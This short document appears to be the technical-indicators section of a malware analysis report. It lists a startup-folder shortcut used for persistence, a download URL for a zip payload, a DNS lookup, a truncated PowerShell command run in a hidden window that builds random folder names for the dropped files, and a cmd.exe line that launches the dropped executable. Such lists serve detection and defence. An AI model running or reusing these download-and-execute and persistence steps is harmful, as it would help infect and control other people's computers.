Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\tyhfo.lnk
- http://vendas.dc-lps.pw/produto/m.zip as $functions_habywnzf+\+ $functions_ztzmugevhjdroj + .zip
- %APPDATA%\logpro
- DNS ASK ve####.dc-lps.pw
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $FuNcTiOnS_hAbYwNzf = 'c:\Sys'+ (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}));$FuNcTiOnS_ztZMUgEVHJdRoJ = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /K c:\SysjmCOv\\tYhFo.exe